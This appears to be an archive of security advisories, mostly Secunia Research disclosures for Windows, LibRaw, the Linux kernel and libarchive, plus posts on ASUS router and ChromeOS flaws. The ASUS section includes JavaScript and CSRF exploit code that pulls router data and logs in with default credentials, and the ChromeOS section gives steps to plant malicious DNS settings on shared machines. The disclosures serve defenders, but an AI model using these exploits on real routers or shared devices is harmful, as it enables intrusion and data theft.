from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software Vulnerability, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing Vulnerability should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address Vulnerability in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software Vulnerability. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and Vulnerability and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-04/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: Microsoft Windows Embedded OpenType Font Engine Font Glyphs Handling Information Disclosure Vulnerability
== Secunia Research 2018/03/14 Microsoft Windows Embedded OpenType Font Engine Font Glyphs Handling Information Disclosure Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Microsoft Windows 7 * Microsoft Windows Server 2008 * Microsoft Windows Server 2012 == 2) Severity Rating: Moderately critical Impact: Information Disclosure Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in icrosoft Windows, which can be exploited by malicious people to disclose certain information. The vulnerability is caused due to an error within the t2embed.dll module when handling font glyphs and can be exploited to cause an out-of-bounds read memory access. == 4) Solution Apply update. == 5) Time Table 2017/12/06 Vendor notified about vulnerability. 2017/12/07 Vendor status update. 2017/12/15 Vendor status update. 2018/02/13 Vendor patch release. 2018/02/14 Secunia Advisory SA7 and SA77077 release. 2018/03/14 - Public disclosure of Secunia Research Advisory. == 6) Credits Hossein Lotfi, Secunia Research at Flexera. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2018-0760 identifier for the vulnerability. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software Vulnerability, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing Vulnerability should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address Vulnerability in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software Vulnerability. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and Vulnerability and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-06/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities
== Secunia Research 2018/03/14 LibRaw Multiple Denial of Service Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * LibRaw versions prior to 0.18.8. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in LibRaw, which can be exploited by malicious people to cause a DoS (Denial of Service). 3.1) A type confusion error within the "identify()" function (internal/dcraw_common.cpp) can be exploited to trigger a division by zero. 3.2) A boundary error within the "quicktake_100_load_raw()" function (internal/dcraw_common.cpp) can be exploited to cause a stack-based buffer overflow and subsequently cause a crash. 3.3) An error within the "leaf_hdr_load_raw()" function (internal/dcraw_common.cpp) can be exploited to trigger a NULL pointer dereference. The vulnerabilities are confirmed in version 0.18.7 and reported in versions prior to 0.18.8. == 4) Solution Update to version 0.18.8. == 5) Time Table 2018/02/23 - Maintainer contacted with the vulnerability details. 2018/02/25 - Maintainer confirmed the vulnerabilities. 2018/02/25 - Maintainer released a fix. 2018/03/08 - Release of Secunia Advisory SA81000. 2018/03/14 - Public disclosure of Secunia Research Advisory. == 6) Credits Laurent Delosieres, Secunia Research at Flexera Software. == 7) References The Flexera Software CNA has assigned the CVE-2018-5804, CVE-2018-5805, and CVE-2018-5806 identifiers for the vulnerabilities through the Common Vulnerabilities and Exposures (CVE) project. == 8) About Flexera Software Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://secuniaresearch.flexerasoftware.com/community/research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered https://secuniaresearch.flexerasoftware.com/community/advisories/ == 9) Verification Please verify this advisory
Secunia Research: Linux Kernel "_sctp_make_chunk()" Denial of Service Vulnerability
== Secunia Research 2018/02/28 Linux Kernel "_sctp_make_chunk()" Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera ...8 Verification.9 == 1) Affected Software * Linux Kernel version 4.15.0. Other versions may also by affected. == 2) Severity Rating: Not critical Impact: Denial of Service Where: Local System == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service). An error in the "_sctp_make_chunk()" function (net/sctp/sm_make_chunk.c) when handling SCTP packets length can be exploited to cause a kernel crash. The vulnerability is confirmed in versions 4.15.0-r7 and 4.15.0. Other versions may also be affected. == 4) Solution Fixed in the source code repository. https://git.kernel.org/linus/07f2c7ab6f8d0a7e7c5764c4e6cc9c52951b9d9c == 5) Time Table 2018/02/07 - Linux Kernel team contacted with vulnerability details. 2018/02/07 - Linux Kernel team advised reporting the vulnerability publicly via netdev mailing list. 2018/02/07 - Public disclosure of the vulnerability on netdev mailing list. 2018/02/09 - The vulnerability additionally reported on linux-sctp mailing list. 2018/02/28 - Release of Secunia Advisory SA81331. 2018/02/28 - Public disclosure of Secunia Research Advisory. == 6) Credits Jakub Jirasek, Secunia Research at Flexera. Additionally reported by Alexey Kodanev. == 7) References The Flexera CNA has assigned CVE-2018-5803 identifier for the vulnerability through the Common Vulnerabilities and Exposures (CVE) project. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexera.com Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. https://www.flexera.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://www.flexera.com/enterprise/company/about/secunia-research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered https://secuniaresearch.flexerasoftware.com/community/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia Research website: https://secuniaresearch.flexerasoftware.com/secunia_research/2018-2 ==
Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities
== Secunia Research 2018/01/29 LibRaw Multiple Denial of Service Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * LibRaw versions prior to 0.18.7. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in LibRaw, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) An off-by-one error within the "LibRaw::kodak_ycbcr_load_raw()" function (internal/dcraw_common.cpp) can be exploited to cause a heap- based buffer overflow and subsequently cause a crash. 2) An error within the "LibRaw::unpack()" function (src/libraw_cxx.cpp) can be exploited to trigger a NULL pointer dereference. 3) An error within the "kodak_radc_load_raw()" function (internal/dcraw_common.cpp) related to the "buf" variable can be exploited to cause an out-of-bounds read memory access and subsequently cause a crash. Successful exploitation of this vulnerability requires the library to be compiled with the "-O0" compilation flag. The vulnerabilities are confirmed in version 0.18.6 and reported in versions prior to 0.18.7. == 4) Solution Update to version 0.18.7. == 5) Time Table 2018/01/16 - Maintainer contacted with the vulnerability details. 2018/01/19 - Maintainer confirmed the vulnerabilities. 2018/01/19 - Maintainer released a fix. 2018/01/25 - Release of Secunia Advisory SA79000. 2018/01/29 - Public disclosure of Secunia Research Advisory. == 6) Credits Laurent Delosieres, Secunia Research at Flexera Software. == 7) References The Flexera Software CNA has assigned the CVE-2018-5800, CVE-2018-5801, and CVE-2018-5802 identifiers for the vulnerabilities through the Common Vulnerabilities and Exposures (CVE) project. == 8) About Flexera Software Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://secuniaresearch.flexerasoftware.com/community/research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a give
Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities
== Secunia Research 2017/12/08 LibRaw Multiple Denial of Service Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * LibRaw versions prior to 0.18.6. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in LibRaw, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) An error related to the "LibRaw::panasonic_load_raw()" function (dcraw_common.cpp) can be exploited to cause a heap-based buffer overflow and subsequently cause a crash via a specially crafted TIFF image. 2) An error within the "LibRaw::xtrans_interpolate()" function (internal/dcraw_common.cpp) can be exploited to cause an invalid read memory access. The vulnerabilities are confirmed in version 0.18.5 and reported in versions prior to 0.18.6. == 4) Solution Update to version 0.18.6. == 5) Time Table 2017/12/04 - Maintainer contacted with the vulnerability details. 2017/12/04 - Maintainer confirmed the vulnerability. 2017/12/06 - Maintainer released a fix. 2017/12/07 - Release of Secunia Advisory SA76000. 2017/12/08 - Public disclosure of Secunia Research Advisory. == 6) Credits Laurent Delosieres, Secunia Research at Flexera Software. == 7) References The Flexera Software CNA has assigned the CVE-2017-16909 and CVE-2017-16910 identifiers for the vulnerabilities through the Common Vulnerabilities and Exposures (CVE) project. == 8) About Flexera Software Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://secuniaresearch.flexerasoftware.com/community/research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered https://secuniaresearch.flexerasoftware.com/community/advisories/ == 9) Verification Please verify this advisory by visiting the website: https://secuniaresearch.flexerasoftware.com/secunia_research/2017-19 ==
Secunia Research: Oracle Outside In Denial of Service Vulnerability
== Secunia Research 2017/10/21 Oracle Outside In Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera ...8 Verification.9 == 1) Affected Software * Oracle Outside In version 8.5.3.0. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerabilitiy Secunia Research has discovered a vulnerability in Oracle Outside In, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error within the vstif6.dll, which can be exploited to cause an out-of-bounds write memory access. The vulnerability is confirmed in version 8.5.3. == 4) Solution Apply update. https://support.oracle.com/rs?type=doc=2296870.1 == 5) Time Table 2017/03/14 - Vendor notified about vulnerability. 2017/03/17 - Vendor supplied bug ticket ID. 2017/05/10 - Vendor asks for extention of publishing deadline. 2017/05/11 - Replied to vendor with new publishing timeline. 2017/05/15 - Vendor supplies information of fix in main codeline. 2017/10/17 - Release of vendor patch. 2017/10/18 - Release of Secunia Advisory SA76869. 2017/11/21 - Public disclosure of Secunia Research Advisory. == 6) Credits Behzad Najjarpour Jabbari, Secunia Research at Flexera == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2017-10051 identifier for the vulnerability. == 8) About Flexera Flexera helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera. https://secuniaresearch.flexerasoftware.com/community/research/ The public Secunia Advisory database contains information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered https://secuniaresearch.flexerasoftware.com/community/advisories/ == 9) Verification Please verify this advisory by visiting the website: https://secuniaresearch.flexerasoftware.com/secunia_research/2017-18/ ==
Secunia Research: Microsoft Windows Heap-based Buffer Overflow Vulnerabilities
== Secunia Research 2016/05/22 Microsoft Windows Heap-based Buffer Overflow Vulnerabilities == Table of Contents Affected Software1 Severity.2 Description of Vulnerabilities...3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * Microsoft Windows 10 * Microsoft Windows 7 * Microsoft Windows 8.1 * Microsoft Windows RT 8.1 * Microsoft Windows Server 2008 * Microsoft Windows Server 2012 * Microsoft Windows Server 2016 * Microsoft Windows Vista == 2) Severity Rating: Highly critical Impact: System access Where: From remote == 3) Description of Vulnerabilities Secunia Research has discovered multiple vulnerabilities in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system. 1) An error within the "LoadUvsTable()" function can be exploited to cause a heap-based buffer overflow via a font file containing specially crafted Unicode Variation Sequences tables. 2) An integer overflow error within the "LoadFont()" function can be exploited to cause a heap-based buffer overflow via a font file containing specially crafted Unicode Variation Sequences tables. Successful exploitation of the vulnerabilities allows execution of arbitrary code. The vulnerabilities are confirmed on a fully patched Windows 10 Professional (gdi32full.dll version 10.0.14393.576) and Windows 7 Professional (usp10.dll version 1.626.7601.23585). Other versions may also be affected. == 4) Solution Apply update. https://technet.microsoft.com/library/security/MS17-013 == 5) Time Table 2016/12/13 - Notified vendor about an incomplete fix of CVE-2016-7274. 2016/12/14 - Release of Secunia Advisory SA74000 due to details implicitly being public. 2016/12/15 - Update of SA74000 with a further vulnerability. 2016/12/29 - Vendor communication regarding root cause analysis. 2017/01/25 - Vendor patch scheduled for February 2017. 2017/02/14 - Vendor announces delay of February 2017 patch releases. 2017/03/06 - Vendor patch scheduled for March 2017. 2017/03/14 - Updated Secunia Advisory SA74000 due to release of vendor patch. 2017/05/22 - Public disclosure of Secunia Research Advisory. == 6) Credits Discovered by Hossein Lotfi, Secunia Research at Flexera Software. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned the CVE-2017-0014 identifier for the vulnerabilities. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software Vulnerability, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing Vulnerability should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address Vulnerability in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software Vulnerability. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulne
Secunia Research: FLAC "read_metadata_vorbiscomment_()" Memory Leak Denial of Service Vulnerability
== Secunia Research 2017/05/11 FLAC "read_metadata_vorbiscomment_()" Memory Leak Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * FLAC version 1.3.2. Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in FLAC, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the "read_metadata_vorbiscomment_()" function (stream_decoder.c), which can be exploited to cause a memory leak via a specially crafted FLAC file. The vulnerability is confirmed in version 1.3.2. Other versions may also be affected. == 4) Solution Fixed in the source code repository. == 5) Time Table 2017/04/06 - Initial contact to request security contact. 2017/04/06 - Maintainer responds with security contact. 2017/04/06 - Maintainer contacted with the vulnerability details. 2017/04/08 - Maintainer provides a patch in the official source code repository. 2017/04/21 - Release of Secunia Advisory SA76102. 2017/05/11 - Public disclosure of Secunia Research Advisory. == 6) Credits Discovered by Jakub Jirasek, Secunia Research at Flexera Software. == 7) References The Flexera Software CNA has assigned the CVE-2017-6888 identifier for the vulnerability through the Common Vulnerabilities and Exposures (CVE) project. == 8) About Flexera Software Flexera Software helps application producers and enterprises increase application usage and the value they derive from their software. http://www.flexerasoftware.com/enterprise/company/about/ Flexera Software delivers market-leading Software Vulnerability Management solutions enabling enterprises to proactively identify and remediate software vulnerabilities, effectively reducing the risk of costly security breaches. http://www.flexerasoftware.com/enterprise/products/ Flexera Software supports and contributes to the community in several ways. We have always believed that reliable vulnerability intelligence and tools to aid identifying and fixing vulnerabilities should be freely available for consumers to ensure that users, who care about their online privacy and security, can stay secure. Only a few vendors address vulnerabilities in a proper way and help users get updated and stay secure. End-users (whether private individuals or businesses) are otherwise left largely alone, and that is why back in 2002, Secunia Research started investigating, coordinating disclosure and verifying software vulnerabilities. In 2016, Secunia Research became a part of Flexera Software and today our in-house software vulnerability research remains the core of the Software Vulnerability Management products at Flexera Software. http://secunia.com/secunia_research/ The public Advisory database contains sufficient information for researchers, security enthusiasts, and consumers to lookup individual products and vulnerabilities and assess, whether they need to take any actions to secure their systems or whether a given vulnerability has already been discovered http://secunia.com/advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2017-7/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
Multiple Vulnerabilities in ASUS Routers [CVE-2017-5891 and CVE-2017-5892]
[Original post here:
https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]
Summary
Various models of ASUS RT routers have several CSRF vulnerabilities
allowing malicious sites to login and change settings in the router;
multiple JSONP vulnerabilities allowing exfiltration of router data
and an XML endpoint revealing WiFi passwords. Most of these issues
have been fixed by Asus in the March 2017 firmware update under
v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains
unfixed since the vendor doesn't consider it to be a security threat.
CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892
to cover the non-CSRF issues.
Vulnerability Details
RT routers from ASUS like many other routers come with a built-in web
interface accessible over the local network but normally not
accessible via the Internet. We discovered multiple issues within that
web interface that would can facilitate attacks on the router either
via a malicious site visited by a user on the same network, or a
malicious mobile or desktop application running on the same network.
For the CSRF vulnerabilities, a user would need to visit a malicious
site which can try to login and change settings. For the JSONP
vulnerabilities, a website can load the JSONP endpoints via SCRIPT
tags as long as matching function name is defined on that site. The
XML endpoint requires a mobile or desktop application to exploit.
NOTE: all of these assume that the attacker knows the local IP address
of the router. This could probably be guessed or be determined via
Javascript APIs like WebRTC. For desktop and mobile applications,
determination of the gateway address should be trivial to implement.
Issue #1 - Login Page CSRF
The login page for the router doesn't have any kind of CSRF
protection, thus allowing a malicious website to submit a login
request to the router without the user's knowledge. Obviously, this
only works if the site either knows the username and password of the
router OR the user hasn't changed the default credentials ("admin /
admin"). To exploit, submit the base-64 encoded username and password
as "login_authorization" form post, to the "/login.cgi" URL of the
browser.
Example of a form that can exploit this issue (uses default credentials):
http://192.168.1.1/login.cgi;
method="post" target="_blank">
Issue #2 - Save Settings CSRF
The various pages within the interface that can save settings do not
have CSRF protection. That means that a malicious site, once logged in
as described above would be able to change any settings in the router
without the user's knowledge.
NOTE: We have not been to exploit this issue consistently
Issue #3 - JSONP Information Disclosure Without Login
Two JSONP endpoints exist within the router which allow detection of
which ASUS router is running and some information disclosure. No login
is required to the router. The vendor doesn't consider these endpoints
a security threat.
The endpoints are as follows:
/findasus.json
Returns the router model name, SSID name and the local IP address of the router
iAmAlive([{model?Name: "XXX", ssid: "YYY", ipAddr: ""}])
/httpd_check.json
Returns: {"alive": 1, "isdomain": 0}
Exploit code as follows:
function iAmAlive(payload) {
window.alert("Result returned: " + JSON.stringify(payload));
}
function alert1() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/findasus.json'
document.getElementsByTagName('head')[0].appendChild(script);
}
function alert2() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/httpd_check.json'
document.getElementsByTagName('head')[0].appendChild(script);
}
Issue #4 - JSONP Information Disclosure, Login Required
There exist multiple JSONP endpoints within the router interface that
reveal various data from the router including.
Below is a list of endpoints and exploit code:
/status.asp - Network Information
function getstatus() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/status.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
function show_wanlink_info() {
var obj = {};
obj.status = wanlink_status();
obj.statusstr = wanlink_statusstr();
obj.wanlink_type = wanlink_type();
obj.wanlink_ipaddr = wanlink_ipaddr();
obj.wanlink_xdns = wanlink_xdns();
window.alert(JSON.stringify(obj));
}
Load Status script
Show wanlink info
/wds_aplist_2g.asp - Surrounding Access points, 2.4 Ghz band
/wds_aplist_5g.asp - Surrounding Access points, 5 Ghz band
function getwds_2g() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/wds_aplist_2g.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
function getwds_5g() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/wds_aplist_5g.asp'
ChromeOS / ChromeBooks Persist Certain Network Settings in Guest Mode
[Original post can be found here: https://wwws.nightwatchcybersecurity.com/2017/04/09/advisory-chromeos-chromebooks-persist-certain-network-settings-in-guest-mode/] SUMMARY Certain network settings in ChromeOS / ChromeBooks persists between reboots when set in guest mode. These issues have been reported to the vendor but will not be fixed since the vendor considers them to be WAI (Working As Intended). These attacks require physical access to the device in order to execute them but future avenues of research looking at network vectors should be undertaken. BACKGROUND ChromeOS is the operating system developed by Google that runs on ChromeBook devices. It is build on top of Linux and around the Chrome browser. The OS has a guest mode which runs Chrome in anonymous mode on top of a temporary guest account. The data within that account is stored in RAM and is erased upon reboot. However, it appears from our research that some settings, especially network related ones, reside elsewhere and do persist between reboots. Our original interest in this area was prompted by a standing $100,000 USD bounty offered by Google to an exploit “that can compromise a Chromebook or Chromebox with device persistence in guest mode (i.e. guest to guest persistence with interim reboot, delivered via a web page)”. While we have not been able to deliver these attacks via a web page, we did achieve some persistence in network settings in guest mode via physical access. Further research is needed to achieve remote exploitation. DETAILS The following network settings were observed in guest mode as persisting between reboots if the change is made by a guest user while the Chromebook is in guest mode: - Details of WiFi network such as password, authentication, etc. - Preferred WiFi network - DNS settings on the currently connected WiFi network To replicate, do the following: 1. Login as a guest into the Chromebook. 2. Click on settings, and: - Try to remove a WiFi network and add a new preferred network; - Or change settings for an existing network; - Or change DNS servers for an existing network 3. Reboot, re-enter guest mode and observe settings persisting The following settings only persist when changes are made on the login screen. If a user logs in as a guest user or a Google account, this goes away: PROXY SETTINGS To replicate: 1. Start the Chromebook until Login prompt appears. DO NOT login. 2. Click on settings, change the proxy settings in the current network. 3. Reboot and go back to the login screen, confirm settings for proxy do persist. 4. Login to an existing account or as guest, check settings again and observe that proxy settings are now greyed out. Implications of this are most important in scenarios where a shared Chromebook is used in a public environment such as a library, school, etc. Using these attacks, a malicious user can modify the settings on a public ChromeBook to point to malicious DNS (like DNS Changer virus) or malicious WiFi hotspot, and subsequent users will not realize that their sessions are affected. We have not been able to achieve remote exploitation, but an existing private Chrome API (chrome.networkingPrivate) would provide access to these settings even in guest mode. This API is not normally available via the Web, so an additional browser exploit would need to be chained to the issues described here to achieve a complete exploit. Another thing to note is that while guest mode normally runs under a RAM disk which is erased after the device is rebooted, the network settings appear to reside elsewhere within the device. That can be used as a further area of possible attacks. All testing was done in 2016 on the following system, and it is not clear if other ChromeBook hardware is affected: Device: Acer C7 Chromebook Chrome Versions: 49.0.2623.95, 49.0.2623.111 and 51.0.2704.106 (stable) ChromeOS Versions: 7834.60.0, 7834.66.0 and 8172.62.0 (stable parrot) VENDOR RESPONSE The vendor has rejected all of these issues as WAI – working as intended. The vendor has provided the following explanation: First of all, note that there are quite a few ways for network settings to propagate into sessions. DNS and proxy (per issue 627299) settings are just two of them. You can go further and just join the device to a malicious WiFi network that it’ll pick up again after rebooting (this is possible from the login screen, no need to start a guest session). Edit: There are more issues filed for these cases, cf. issue 600194 and issue 595563. If we were to crack down on propagation of (malicious) network settings into sessions, we’d take quite a UX hit, as we’d have to prompt the user to reconfirm their network settings whenever the device is connected to a network that user hasn’t yet approved (and it’s quite unlikely for this to be effective). The alternative of only allowing the device owner to configure networks doesn’t fly either as it has the potential to lock out legitimate users
Secunia Research: libarchive "lha_read_file_header_1()" Out-Of-Bounds Memory Access Denial of Service Vulnerability
== Secunia Research 2017/01/27 libarchive "lha_read_file_header_1()" Out-Of-Bounds Memory Access Denial of Service Vulnerability == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Flexera Software...8 Verification.9 == 1) Affected Software * libarchive version 3.2.2. Other versions may also be affected. == 2) Severity Rating: Moderately critical Impact: Denial of Service Where: From remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in libarchive, which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the "lha_read_file_header_1()" function (archive_read_support_format_lha.c), which can be exploited to trigger an out-of-bounds read memory access via a specially crafted archive. The vulnerability is confirmed in version 3.2.2. Other versions may also be affected. == 4) Solution Fixed in the source code repository. https://github.com/libarchive/libarchive/commit/ 98dcbbf0bf4854bf987557e55e55fff7abbf3ea9 == 5) Time Table 2016/12/20 - Initial contact to request security contact. 2016/12/27 - Maintainer responds with security contacts. 2016/12/29 - Maintainers provided with the vulnerability details. 2017/01/11 - Request for status after no response. 2017/01/16 - Maintainers 